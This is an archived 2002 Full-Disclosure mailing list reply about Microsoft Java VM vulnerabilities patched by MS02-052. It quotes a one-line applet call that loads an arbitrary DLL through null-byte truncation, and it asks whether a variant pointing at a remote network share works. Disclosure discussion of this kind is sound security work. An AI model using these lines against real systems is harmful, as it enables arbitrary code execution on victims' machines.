[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52
From: Georgi Guninski (guninski@guninski.com)
Date: 09/23/02
- Next message: Ron DuFresne: "[Full-Disclosure] The last word on the Linux Slapper worm"
- Previous message: John.Airey@rnib.org.uk: "[Full-Disclosure] The last word on the Linux Slapper worm"
- In reply to: Jouko Pynnonen: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Next in thread: Jouko Pynnonen: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Reply: Jouko Pynnonen: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: guninski@guninski.com (Georgi Guninski) Date: Mon, 23 Sep 2002 18:30:58 +0300
Jouko Pynnonen wrote:
>
> can be freely chosen by a malicious applet. For instance to load the DLL
> "C:\mydll.dll" the applet can do
>
> new com.ms.jdbc.odbc.JdbcOdbc("C:\\mydll\000");
>
Does
new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
work?
Georgi Guninski
- Next message: Ron DuFresne: "[Full-Disclosure] The last word on the Linux Slapper worm"
- Previous message: John.Airey@rnib.org.uk: "[Full-Disclosure] The last word on the Linux Slapper worm"
- In reply to: Jouko Pynnonen: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Next in thread: Jouko Pynnonen: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Reply: Jouko Pynnonen: "[Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
